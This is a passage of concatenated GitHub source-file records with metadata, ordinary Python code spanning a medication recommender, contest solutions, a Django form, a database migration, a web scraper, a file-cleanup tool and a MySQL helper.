self.active_users.to_csv('./RecSys/out/test/au_list.csv',index=False)\n\n def __preset__(self):\n matrix= pd.DataFrame(columns=self.feature_matrix.columns)\n for i,a_user in enumerate(self.active_users.encounter_id):\n if not (self.feature_matrix.loc[self.feature_matrix['encounter_id']== a_user].empty):\n data = self.feature_matrix.loc[self.feature_matrix['encounter_id']== a_user]\n matrix = matrix.append(data)#.copy)\n self.feature_matrix = self.feature_matrix.drop(self.feature_matrix[self.feature_matrix.encounter_id == a_user].index)\n self.matrix_test = matrix\n\n def __split_data__(self):\n #items = ['metformin', 'insulin']\n item_id = pd.get_dummies(self.feature_matrix['item_id'],prefix=['item_id'],dtype=float)\n y = self.feature_matrix['ratings'].to_frame()\n dummy = self.feature_matrix.drop(['ratings', 'encounter_id'], axis=1)\n df = pd.concat([item_id, dummy],axis=1, join='inner', sort=False)\n \n X = df #scipy.sparse.csr_matrix(df)\n return train_test_split( X, y, test_size=0.25, random_state=42)\n \n def areEqual(self,arr1, arr2, n, m): \n # If lengths of array are not \n # equal means array are not equal \n if (n != m): \n return False \n \n # Sort both arrays \n arr1.sort(); \n arr2.sort(); \n \n # Linearly compare elements \n for i in range(0, n - 1): \n if (arr1[i] != arr2[i]): \n return False \n \n # If all elements were same. \n return True\n\n def __train__(self):\n rmses_all = []\n maes_all = []\n models_all = []\n params_all=[]\n for i, fold in enumerate(np.arange(self.n_folds)):\n rmses = []\n models = []\n maes = []\n print('Factorization Machine')\n num_factors=[20,30,50,70,80]#np.arange(79,84)\n #num_iter=[20, 30, 40, 50, 60]\n initial_learning_rate=[0.001, 0.01, 0.005, 0.009, 0.003]\n params=[]\n print(\"\\rFOLD Loop {}/{}.\".format(fold+1, self.n_folds), end='\\r')\n print('-----------------------------------------------')\n sys.stdout.flush()\n #training_data =training_utility[initial:final]\n print('Cross validation in progress...')\n self.X_train, self.X_val, self.y_train, self.y_val = self.__split_data__()\n self.indices_X_val = np.asarray(self.X_val.index.values.tolist())\n self.indices_y_val = np.asarray(self.y_val.index.values.tolist())\n #print(self.X_train.indices.tolist())\n #print(len(self.X_train.indices.tolist()))\n n = len(self.indices_X_val)\n m=len(self.indices_y_val)\n if (self.areEqual(self.indices_X_val, self.indices_y_val, n, m)): \n print(\"Yes\") \n else: \n print(\"No\") \n dummy = self.X_train \n #print(dummy)\n #print(type(dummy.values))\n self.X_train = scipy.sparse.csr_matrix((dummy) ,dtype=float)\n dummy = self.X_val\n self.X_val = scipy.sparse.csr_matrix((dummy),dtype=float)\n dummy = self.y_train\n self.y_train = dummy.values.ravel()\n dummy = self.y_val\n self.y_val = dummy.values.ravel()\n #print(self.X_train)\n for i in np.arange(0,1):\n name = 'data_fold_'+str(fold+1) +'_loop_'+str(i)\n print('Starts training ------------------------------------------------------------')\n #i = np.random.randint(0,5)\n #j = np.random.randint(0,5)\n #k = np.random.randint(0,5)\n # Train a Factorization Machine\n #param ={'num_factors':num_factors[i], 'num_iter':num_iter[j], 'initial_learning_rate':initial_learning_rate[k]}\n param ={'num_factors':num_factors[i], 'initial_learning_rate':initial_learning_rate[i]}\n params.append(param)\n fm = pylibfm.FM(num_factors=num_factors[i], num_iter=50, verbose=True, task=\"regression\", \n initial_learning_rate=initial_learning_rate[i], learning_rate_schedule=\"constant\")\n fm.fit(self.X_train,self.y_train) #[0:2000]\n self.__saving_models__(fm,fold,i)\n\n #Validate a FM\n df_val, rmse, mae =self.__validation__(fm)\n self.__saving_pred_training__(df_val,fold,i)\n rmses.append(rmse)\n models.append(fm)\n maes.append(mae)\n #save_path = save_path+'metrics_results.csv'\n #self.__save_metrics__(rmses, maes, './RecSys/out/FM/train/', fold)\n rmses_all.append(rmses)\n maes_all.append(maes)\n models_all.append(models)\n params_all.append(params)\n self.__save_metrics__(rmses_all, maes_all, './RecSys/out/FM/train/', fold)\n self.best_fm = self.__best_model__(rmses_all, models_all,params_all)\n\n def __validation__(self, fm): \n preds = fm.predict(self.X_val)\n rmse, mae = self.__evaluation__(preds, self.y_val)\n preds_set = pd.DataFrame({'prediction': preds})\n indices_set = pd.DataFrame({'index': self.indices_X_val})\n df_val = pd.concat([indices_set, preds_set],axis=1, join='inner', sort=False)\n return df_val, rmse, mae\n \n def __evaluation__(self, preds, y_truth):\n \"\"\"\n Create an evaluation object for calculating the root mean square error (RMSE) and mean absolute error (MAE)\n \"\"\"\n mse = mean_squared_error(y_truth,preds)\n mae = np.mean(np.abs(y_truth - preds))\n print(\"FM MSE: %.4f\" % mse)\n rmse = np.sqrt(mse)\n return rmse, mae\n\n def __best_model__(self, mses,models, params):\n best_model_list = []\n best_param_list = []\n less_rmse_list = []\n best_model = None\n for i,rms in enumerate(mses):\n index_max = np.argmin(rms) #np.argmax(mses)\n best_model = models[i][index_max]\n best_param = params[i][index_max]\n print('The best model is: ',best_model)\n print('The best param is: ',best_param)\n best_model_list.append(best_model)\n best_param_list.append(best_param)\n less_rmse_list.append(rms)\n return best_model\n\n def __saving_models__(self, model,fold,i):\n filename = './RecSys/out/FM/models/model_'+str(fold+1)+'_loop_'+str(i)+'.sav'\n joblib.dump(model, filename)\n\n def __saving_pred_training__(self, df_val, fold,i):\n df_val.to_csv('./RecSys/out/FM/train/pred_'+str(fold+1)+'_loop_'+str(i)+'.csv')\n\n def __save_metrics__(self, rmses, maes, save_path, fold):\n \"\"\"\n Method for saving the errors RMSE and MAE\n \"\"\"\n metrics_results = pd.DataFrame(columns=['RMSE', 'MAE'])\n #rmse = np.mean(rmses)\n #mae = np.mean(maes)\n record = pd.Series([rmses, maes], index=['RMSE', 'MAE'])\n metrics_results = metrics_results.append(record, ignore_index=True)\n save_path = save_path+'metrics_results'+str(fold+1)+'.csv'\n metrics_results.to_csv(save_path, index=False)\n print(\"Metrics results can be found here: \" + save_path)\n\n def get_predictions(self):\n #items = ['metformin', 'insulin'\n item_id = pd.get_dummies(self.matrix_test['item_id'],prefix=['item_id'],dtype=float)\n y = self.matrix_test['ratings'].to_frame()\n dummy = self.matrix_test.drop(['ratings', 'encounter_id'], axis=1)\n df = pd.concat([item_id, dummy],axis=1, join='inner', sort=False)\n \n #indices = df.index.values.tolist()\n #print(indices)\n #X = scipy.sparse.csr_matrix((df, indices))\n X = scipy.sparse.csr_matrix(df, dtype = float)\n #print(X)\n preds = self.best_fm.predict(X)\n mse = mean_squared_error(y,preds)\n rmse = np.sqrt(mse)\n mae = mean_absolute_error(y,preds)\n print(\"FM MSE: %.4f\" % mse)\n #print(preds)\n preds_final = pd.concat([self.matrix_test.encounter_id, pd.DataFrame(preds)],axis=1, join='inner', sort=False)\n #pd.DataFrame(preds).to_csv('./RecSys/out/FM/results/pred_au.csv')\n preds_final.to_csv('./RecSys/out/FM/results/pred_au.csv', index=False)\n metrics_results = pd.DataFrame(columns=['RMSE', 'MAE'])\n #rmse, mae = self.__evaluation__(preds, y)\n record = pd.Series([rmse, mae], index=['RMSE', 'MAE'])\n metrics_results = metrics_results.append(record, ignore_index=True)\n metrics_results.to_csv('./RecSys/out/FM/results/metrics_au.csv', index=False)\n return preds_final\n \n\n ","repo_name":"pachecon/diabetic_medications_RecommenderSystem","sub_path":"src/rs_model_src/rs_model_FM.py","file_name":"rs_model_FM.py","file_ext":"py","file_size_in_byte":10573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31842162445","text":"import sys \n\ndef write(x, y):\n print( \"%d %d\"%(x, y) )\n sys.stdout.flush()\n\ndef read():\n a = sys.stdin.readline().split()\n if len(a) == 3:\n exit()\n for i in range(665):\n sys.stdin.readline() \n\nx, y = map(int, input().split())\n \nwhile 1:\n read() \n \n if x < 500:\n x += 1\n if x > 500:\n x -= 1\n if y < 500:\n y += 1\n if y > 500:\n y -= 1\n \n write(x, y)\n\n if x == 500 and y == 500:\n break \n\np = []\nfor i in range(666):\n a = list(map(int, sys.stdin.readline().split()))\n p.append(a)\n\np1, p2, p3, p4 = 0,0,0,0\n\nfor i in p:\n x, y = i[0], i[1]\n if 1<=x<=499 and 1<=y<=499:\n p1+=1\n elif x>=501 and 1<=y<=499:\n p2+=1\n elif 1<=x<=499 and y>=501:\n p3+=1\n elif x>=501 and y>=501:\n p4+=1\n\nk = [p1, p2, p3, p4]\nif min(k) == p1:\n dx, dy = 1, 1\nelif min(k) == p2:\n dx, dy = -1, 1\nelif min(k) == p3:\n dx, dy = 1, -1\nelse:\n dx, dy = -1, -1\n\n\nwhile 1:\n read()\n\n x += dx\n y += dy\n\n write(x, y)\n","repo_name":"ploffer11/Python3","sub_path":"534D.py","file_name":"534D.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"16282037758","text":"from django import forms\n\nPRODUCT_QUENTITY_CHOICES = [(i, str(i)) for i in range(1,21)]\n\nclass CartAddProdcutForm(forms.Form):\n quentity = forms.TypedChoiceField( \n widget=forms.Select(attrs={\n 'style':\"width: 100px\",\n 'class':\"form-control\",\n 'aria-label':\"Search\",\n 'value':\"1\",\n 'type':\"number\",\n }),\n choices=PRODUCT_QUENTITY_CHOICES, coerce=int)\n update = forms.BooleanField(required=False, initial=False, widget=forms.HiddenInput)","repo_name":"mahmoudabuelnaga/shoppy","sub_path":"cart/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11349118536","text":"import json, collections, csv\n\nimport timestamp_utils, report_columns\nfrom snapshot import Snapshot\n\ndef all_measurement_names(snapshot_log):\n return set.union(*[set(snapshot.measurements.keys()) for snapshot in snapshot_log])\n\ndef merge_dicts(*args):\n answer = dict()\n for dd in args:\n answer.update(dd)\n\n return answer\n\ndef with_empty_cells_set_to_none(snapshots):\n all_nones = {measurement_name : None for measurement_name in all_measurement_names(snapshots)}\n\n def overlay_available_measurements(measurements):\n return merge_dicts(all_nones, measurements)\n \n return [snapshot.map_measurements(overlay_available_measurements) \\\n for snapshot in snapshots]\n\ndef flatten_by_timestamp(snapshots_log):\n by_timestamp = collections.defaultdict(dict)\n \n for snapshot in snapshots_log:\n timestamp = snapshot.timestamp\n measurements = snapshot.measurements\n \n for measurement_name, measurement_result in measurements.iteritems():\n by_timestamp[timestamp][measurement_name] = measurement_result\n\n timestamps_in_order = sorted(by_timestamp.keys())\n return [Snapshot(timestamp, by_timestamp[timestamp]) for timestamp in timestamps_in_order]\n\ndef compute_observations(observables, snapshots):\n def compute_all_observables(measurements):\n answer = {}\n for observable in observables:\n if observable.measurement.name not in measurements:\n continue\n \n measured_input = measurements[observable.measurement.name]\n answer[observable.name] = observable.transformation(measured_input)\n return answer\n \n return [snapshot.map_measurements(compute_all_observables) for snapshot in snapshots]\n\ndef write_csv(snapshots, output_file):\n writer = csv.writer(output_file, delimiter=',')\n\n available_columns = all_measurement_names(snapshots)\n column_names = [x for x in report_columns.columns_in_order if report_columns.our_name_for(x) in available_columns]\n writer.writerow(['timestamp'] + column_names)\n\n for row in snapshots:\n values = row.measurements\n timestamp_str = timestamp_utils.to_string(row.timestamp)\n line = [timestamp_str] + [values[report_columns.our_name_for(name)] for name in column_names]\n writer.writerow(line)\n\ndef sort_by_timestamp(snapshots):\n return list(sorted(snapshots, key=lambda snapshot:snapshot.timestamp))\n\ndef observations_from_log(observables, log_filename):\n snapshots = [Snapshot.from_data_dict(json.loads(line)['snapshot']) \\\n for line in file(log_filename).readlines()]\n\n snapshot_log = sorted(snapshots, key=lambda snapshot:snapshot.timestamp)\n observations = compute_observations(observables, flatten_by_timestamp(snapshot_log))\n\n return observations\n \n","repo_name":"kshitijl/camellia-stats","sub_path":"webcomic_stats_scraper/report_generation.py","file_name":"report_generation.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41687538230","text":"\"\"\"empty message\n\nRevision ID: 75d55ff74fef\nRevises: 6e67b963768a\nCreate Date: 2022-03-25 16:24:51.320479\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '75d55ff74fef'\ndown_revision = '6e67b963768a'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('status',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=30), nullable=True),\n sa.Column('domain', sa.String(length=30), nullable=True),\n sa.Column('is_default', sa.Boolean(), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('transition',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('from_status_id', sa.Integer(), nullable=False),\n sa.Column('to_status_id', sa.Integer(), nullable=False),\n sa.ForeignKeyConstraint(['from_status_id'], ['status.id'], ),\n sa.ForeignKeyConstraint(['to_status_id'], ['status.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('level',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('variable_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=30), nullable=False),\n sa.Column('sequence', sa.Integer(), nullable=False),\n sa.Column('description', sa.String(length=200), nullable=True),\n sa.Column('procedure', sa.String(length=200), nullable=True),\n sa.ForeignKeyConstraint(['variable_id'], ['variable.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('experiment_variable',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('experiment_id', sa.Integer(), nullable=False),\n sa.Column('variable_id', sa.Integer(), nullable=False),\n sa.Column('role', sa.String(length=10), nullable=True),\n sa.Column('monday', sa.Boolean(), nullable=True),\n sa.Column('tuesday', sa.Boolean(), nullable=True),\n sa.Column('wednesday', sa.Boolean(), nullable=True),\n sa.Column('thursday', sa.Boolean(), nullable=True),\n sa.Column('friday', sa.Boolean(), nullable=True),\n sa.Column('saturday', sa.Boolean(), nullable=True),\n sa.Column('sunday', sa.Boolean(), nullable=True),\n sa.Column('final', sa.Boolean(), nullable=True),\n sa.ForeignKeyConstraint(['experiment_id'], ['experiment.id'], ),\n sa.ForeignKeyConstraint(['variable_id'], ['variable.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('condition_variable',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('condition_id', sa.Integer(), nullable=False),\n sa.Column('experiment_variable_id', sa.Integer(), nullable=False),\n sa.Column('level_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['condition_id'], ['condition.id'], ),\n sa.ForeignKeyConstraint(['experiment_variable_id'], ['experiment_variable.id'], ),\n sa.ForeignKeyConstraint(['level_id'], ['level.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('unit',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('condition_id', sa.Integer(), nullable=False),\n sa.Column('code', sa.String(length=10), nullable=True),\n sa.Column('description', sa.String(length=200), nullable=True),\n sa.Column('node_id', sa.Integer(), nullable=True),\n sa.Column('cube_level', sa.String(length=10), nullable=True),\n sa.Column('replicate_no', sa.Integer(), nullable=True),\n sa.Column('row', sa.String(length=1), nullable=True),\n sa.Column('column', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['condition_id'], ['condition.id'], ),\n sa.ForeignKeyConstraint(['node_id'], ['node.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.add_column('observation', sa.Column('unit_id', sa.Integer(), nullable=False))\n op.add_column('observation', sa.Column('condition_variable_id', sa.Integer(), nullable=False))\n op.drop_constraint('observation_ibfk_2', 'observation', type_='foreignkey')\n op.create_foreign_key(None, 'observation', 'condition_variable', ['condition_variable_id'], ['id'])\n op.create_foreign_key(None, 'observation', 'unit', ['unit_id'], ['id'])\n op.drop_column('observation', 'variable_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('observation', sa.Column('variable_id', mysql.INTEGER(display_width=11), autoincrement=False, nullable=False))\n op.drop_constraint(None, 'observation', type_='foreignkey')\n op.drop_constraint(None, 'observation', type_='foreignkey')\n op.create_foreign_key('observation_ibfk_2', 'observation', 'variable', ['variable_id'], ['id'])\n op.drop_column('observation', 'condition_variable_id')\n op.drop_column('observation', 'unit_id')\n op.drop_table('unit')\n op.drop_table('condition_variable')\n op.drop_table('experiment_variable')\n op.drop_table('level')\n op.drop_table('transition')\n op.drop_table('status')\n # ### end Alembic commands ###\n","repo_name":"Dandelion-dev-team/dandelion","sub_path":"Flask/migrations/versions/75d55ff74fef_.py","file_name":"75d55ff74fef_.py","file_ext":"py","file_size_in_byte":5045,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"40670621566","text":"def solution(triangle):\n answer = [triangle[0]]\n for i in range(1, len(triangle)):\n arr = []\n for j in range(len(triangle[i])):\n flag = False\n if j == 0:\n arr.append(triangle[i][j] + answer[i - 1][j])\n elif j == len(triangle[i - 1]):\n arr.append(triangle[i][j] + answer[i - 1][j - 1]) \n else:\n arr.append(triangle[i][j] + max(answer[i - 1][j - 1], answer[i - 1][j])) \n answer.append(arr)\n \n return max(answer[-1])","repo_name":"REXIANN/AlgorithmSolving","sub_path":"programmers/정수삼각형.py","file_name":"정수삼각형.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"5619324297","text":"from copy import deepcopy\nfrom os import remove as os_remove\n\nfrom src.config import Config\nfrom src.file import File\nfrom src.prompt import prompt_samename\n\ndef run_samename(target: dict[str, File], dir: dict[str, File], conf: Config) -> tuple[dict[str, File], dict[str, File]]:\n analyze_samename_all(target, dir)\n new_target = deepcopy(target)\n for fullname, file in target.items():\n if not file.state_flags[5]:\n continue\n if not prompt_samename(fullname, file.ref_file):\n continue\n solve_samename(target, dir, file, fullname)\n new_target.pop(fullname)\n target = new_target\n\n new_dir = deepcopy(dir)\n for fullname, file in dir.items():\n if not file.state_flags[5]:\n continue\n if not prompt_samename(fullname, file.ref_file):\n continue\n solve_samename(target, dir, file, fullname)\n new_dir.pop(fullname)\n dir = new_dir\n\n return new_target, new_dir\n\ndef solve_samename(target: dict[str, File], dir: dict[str, File], file: File, file_fullname: str) -> None:\n os_remove(file_fullname)\n for tfile in target.values():\n if tfile.ref_file == file_fullname:\n tfile.ref_file = file.ref_file\n for dfile in dir.values():\n if dfile.ref_file == file_fullname:\n dfile.ref_file = file.ref_file\n\ndef analyze_samename_all(target: dict[str, File], dir: dict[str, File]):\n for fullpath1, tfile in target.items():\n for dfullname, dfile in dir.items():\n analyze_samename(tfile, dfile, fullpath1, dfullname)\n for fullpath2, t2file in target.items():\n if fullpath1 != fullpath2:\n analyze_samename(tfile, t2file, fullpath1, fullpath2)\n\ndef analyze_samename(file1: File, file2: File, file1_fullname: str, file2_fullname: str):\n if file1.name == file2.name:\n if file2.mtime <= file1.mtime:\n file2.state_flags[5] = True\n file2.ref_file = file1_fullname\n else:\n file1.state_flags[5] = True\n file1.ref_file = file2_fullname\n","repo_name":"MortonPL/Caduceus","sub_path":"src/mode/samename.py","file_name":"samename.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14930197083","text":"import time\nimport speech_recognition as sr\n\ndef recognizeVoice():\n output = \"\"\n def callback(recognizer, audio):\n try:\n output = recognizer.recognize_google(audio)\n print(output)\n except sr.UnknownValueError:\n print(\"Google Speech Recognition could not understand audio\")\n output = \"\"\n except sr.RequestError as e:\n print(\"Could not request results from Google Speech Recognition service; {0}\".format(e))\n output = \"\"\n if \"athena\" in output or \"athina\" in output:\n output = output.replace(\"athena\", \"\")\n output = output.replace(\"athina\", \"\")\n return output\n\n r = sr.Recognizer()\n m = sr.Microphone()\n with m as source:\n r.adjust_for_ambient_noise(source) #calibrates for background audio\n print(\"Listening...\")\n stop_listening = r.listen_in_background(m, callback)\n for i in range(50): \n time.sleep(0.1)\n stop_listening(wait_for_stop=False)","repo_name":"Acrylami/CodeClubAssistant","sub_path":"voiceRecognition.py","file_name":"voiceRecognition.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"27614590808","text":"\"\"\"\nID: happyn61\nLANG: PYTHON3\nPROB: loan\n\"\"\"\nfrom itertools import product\nimport itertools\nimport math\n#from collections import defaultdict\nimport sys\nimport heapq\nfrom collections import deque\nMOD=1000000000007\n#fin = open ('loan.in', 'r')\n#fout = open ('loan.out', 'w')\n#print(dic[\"4734\"])\ndef find(parent,i):\n\n\n if parent[i] != i: \n parent[i]=find(parent,parent[i]) \n return parent[i] \n\n # A utility function to do union of two subsets \ndef union(parent,rank,xx,yy): \n x=find(parent,xx)\n y=find(parent,yy)\n if rank[x]>rank[y]:\n parent[y]=x\n elif rank[y]>rank[x]:\n parent[x]=y\n else:\n parent[y]=x\n rank[x]+=1\nans=0\n#NK=sys.stdin.readline().strip().split()\nK=int(sys.stdin.readline().strip())\n#N=int(NK[0])\n#K=int(NK[1])\n#M=int(NK[2])\n#ol=list(map(int,sys.stdin.readline().strip().split()))\n#d={0:0,1:0}\n\nx=0\ny=0\n\n#d={\"N\":(0,1),\"S\":(0,-1),\"W\":(-1,0),\"E\":(1,0)}\nfor _ in range(K):\n #a=int(sys.stdin.readline().strip())\n n,a,b=list(map(int,sys.stdin.readline().strip().split()))\n l=list(sys.stdin.readline().strip())\n if b==0:\n print(n*a)\n elif b>0:\n print(n*a+b*n)\n else:\n stack=[]\n for c in l:\n if len(stack)==0 or stack[-1][0]!=c:\n stack.append([c,1])\n elif stack[-1][0]==c:\n stack[-1][1]+=1\n p=0\n q=0\n for i,j in stack:\n if i==\"0\":\n p+=1\n else:\n q+=1\n k=min(p,q)+1\n print(n*a+k*b)\n","repo_name":"happyn6s1/USACO","sub_path":"python/1550B.py","file_name":"1550B.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"74020385646","text":"'''\nencoding:utf-8\nauthor:yh\ndate:2023/3/20 10:41\n'''\nimport requests\nfrom lxml import etree\nimport time\n\nurl = \"http://www.xiyi.edu.cn/gzcylist.jsp\"\n# url=\"http://www.xiyi.edu.cn/gzcylist.jsp?totalpage=101&PAGENUM=1&urltype=tree.TreeTempUrl&wbtreeid=1172\"\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.41'}\npagenum = 1\n\nparams = {\n \"totalpage\": 101,\n \"PAGENUM\": pagenum, # 设置分页\n \"urltype\": \"tree.TreeTempUrl\",\n \"wbtreeid\": 1172\n}\n# html = requests.get(url, headers=headers)\nhtml = requests.get(url, headers=headers, params=params)\nhtml.encoding = \"utf-8\"\n# print(html.text)\n\nselectors = etree.HTML(html.text)\n\n# 浏览器会对html文本进行一定的规范化,所以会自动在路径中加入tbody,导致读取失败,在此处直接在路径中去除tbody即可。 \n# trackingCode = selectors.xpath(\"//*[@class='content']/table[1]/tr[2]/td[2]/text()\")[0]\n# title = selectors.xpath(\"//tr[2]/td[3]/a/text()\")[0]\n# submitTime = selectors.xpath(\"//tr[2]/td[4]/text()\")[0]\n# resolveTime = selectors.xpath(\"//tr[2]/td[5]/text()\")[0]\n# s = str(trackingCode) + ',' + str(title) + ',' + str(submitTime) + ',' + str(resolveTime)\n# s = s.replace(\" \", \"\").strip().replace(\"\\n\", \"\")\n# print(s)\n\nf = open(\"XiaoZhangXinXiang.csv\", \"a\", encoding=\"utf-8\")\nf.write(\"查询码,标题,提交时间,处理状态\\n\")\ni = 2\nwhile True:\n try:\n trackingCode = selectors.xpath(\"//*[@class='content']/table[1]/tr[\" + str(i) + \"]/td[2]/text()\")[0]\n title = selectors.xpath(\"//tr[\" + str(i) + \"]/td[3]/a/text()\")[0]\n submitTime = selectors.xpath(\"//tr[\" + str(i) + \"]/td[4]/text()\")[0]\n resolveTime = selectors.xpath(\"//tr[\" + str(i) + \"]/td[5]/text()\")[0]\n except:\n break\n\n s = str(trackingCode) + ',' + str(title) + ',' + str(submitTime) + ',' + str(resolveTime)\n s = s.replace(\" \", \"\").strip().replace(\"\\n\", \"\")\n print(i - 1, s)\n i += 1\n f.write(s + \"\\n\")\n\nf.close()\n","repo_name":"Asucanyh-cn/pythonProject","sub_path":"pyProject2023/chapter4/xiaozhangxinxiang.py","file_name":"xiaozhangxinxiang.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21925738369","text":"from c7n_azure.provider import resources\nfrom c7n_azure.resources.arm import ArmResourceManager\n\n\n@resources.register('routetable')\nclass RouteTable(ArmResourceManager):\n \"\"\"Route Table Resource\n\n :example:\n\n Finds all Route Tables in the subscription.\n\n .. code-block:: yaml\n\n policies:\n - name: find-all-route-tables\n resource: azure.routetable\n\n \"\"\"\n\n class resource_type(ArmResourceManager.resource_type):\n doc_groups = ['Networking']\n\n service = 'azure.mgmt.network'\n client = 'NetworkManagementClient'\n enum_spec = ('route_tables', 'list_all', None)\n default_report_fields = (\n 'name',\n 'location',\n 'resourceGroup',\n 'properties.subnets[].id'\n )\n resource_type = 'Microsoft.Network/routeTables'\n","repo_name":"harsh4870/cloud-custodian","sub_path":"cloud-custodian/tools/c7n_azure/c7n_azure/resources/route_table.py","file_name":"route_table.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"8595529540","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\"\"\"This module manage all the dialogue with in MySQL.\"\"\"\n\nfrom datetime import datetime\nimport mysql.connector\n\nfrom database_xchange.config import info_bdd\n\n\nclass DataMgt:\n \"\"\"Management of all SQL request.\"\"\"\n\n def __init__(self):\n self.selected_prod = ()\n self.product_origin = ()\n self.product_substitute = ()\n self.my_database = mysql.connector.connect(**info_bdd)\n self.my_cursor = self.my_database.cursor()\n self.category_selected = ()\n self.myresult_1 = None\n self.myresult_0 = None\n\n def get_all_cat(self):\n \"\"\"retrieve all categories.\"\"\"\n\n self.my_cursor.execute(\"SELECT id_category, name FROM Categories\")\n self.myresult_0 = self.my_cursor.fetchall()\n return self.myresult_0\n\n def get_prod_by_category(self, category_selected):\n \"\"\"retrieve product by category.\"\"\"\n\n query = (\"SELECT id_product, name, brand, id_category, nutriscore,\"\n \" description, store FROM Products \"\n \"WHERE id_category = %s ORDER BY name\")\n self.my_cursor.execute(query, (category_selected,))\n myresult = self.my_cursor.fetchall()\n return myresult\n\n def get_one_prod(self, id_product):\n \"\"\"retrieve a product and all the information associated with the\n id_product input.\"\"\"\n\n query = (\"name, brand, id_category, nutriscore,\"\n \" description, store FROM Products \"\n \"WHERE id_product = %s\")\n self.my_cursor.execute(query, (id_product,))\n myresult = self.my_cursor.fetchall()\n return myresult\n\n def save_substitute(self, product_origin, product_substitute):\n \"\"\"save substitute product in database.\"\"\"\n\n date_time = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n self.my_database = mysql.connector.connect(**info_bdd)\n self.my_cursor = self.my_database.cursor()\n query = (\n \"INSERT INTO Favorites (id_product_origin, id_product_substitute,\"\n \" request_date) \"\n \"VALUES (%s, %s, %s)\"\n )\n data = (product_origin[0], product_substitute[0], date_time)\n self.my_cursor.execute(query, data)\n self.my_database.commit()\n\n def get_all_favorites(self):\n \"\"\"retrieve all substitutes products saved in database.\"\"\"\n\n self.my_cursor.execute(\n \"SELECT id_favorite, name, nutriscore, request_date\"\n \" FROM Products\"\n \" INNER JOIN favorites ON \"\n \"products.id_product = favorites.id_product_substitute\"\n \" UNION\"\n \" SELECT id_favorite, name, nutriscore, request_date\"\n \" FROM Products\"\n \" INNER JOIN favorites ON \"\n \"products.id_product = favorites.id_product_origin\"\n \" ORDER BY id_favorite DESC\")\n self.myresult_0 = self.my_cursor.fetchall()\n self.myresult_1 = [self.myresult_0[i] + self.myresult_0[i+1] for i in range(0, len(self.myresult_0), 2)]\n return self.myresult_1\n\n def suggest_substitute(self, product_origin):\n \"\"\"suggest a substitute with a better nutriscore than the product\n selected by the user.\"\"\"\n\n query1 = (\"SELECT id_product, name, description, store, url, brand,\"\n \" nutriscore FROM Products \"\n \"WHERE id_category = %s AND nutriscore < %s\")\n self.my_cursor.execute(query1, (product_origin[3], product_origin[4],))\n myresult = self.my_cursor.fetchall()\n if not myresult:\n query2 = (\"SELECT id_product, name, description, store, url,\"\n \" brand, nutriscore FROM Products \"\n \"WHERE id_category = %s AND nutriscore = %s\")\n self.my_cursor.execute(\n query2, (product_origin[3], product_origin[4],))\n myresult = self.my_cursor.fetchall()\n return myresult\n\n def is_database_empty(self):\n \"\"\"test if Table product is empty.\"\"\"\n\n query = (\"SELECT 1 FROM Products LIMIT 1\")\n self.my_cursor.execute(query)\n content = self.my_cursor.fetchall()\n return content\n\n\"\"\"\nfrom datetime import datetime\nimport mysql.connector\n\nfrom database_xchange.config import info_bdd\n\n\nclass BaseManager:\n\n def __init__(self, db):\n self.db = db # db is also my_database with mysql-connector\n self.my_cursor = self.my_database.cursor()\n self.myresult = None\n\nclass CategoryManager(BaseManager):\n # management of \n\n def __init__(self, db):\n super().__init__(db)\n\n def get_all(self):\n # get all categories\n\n self.my_cursor.execute(\"SELECT id_category, name FROM Categories\")\n self.myresult 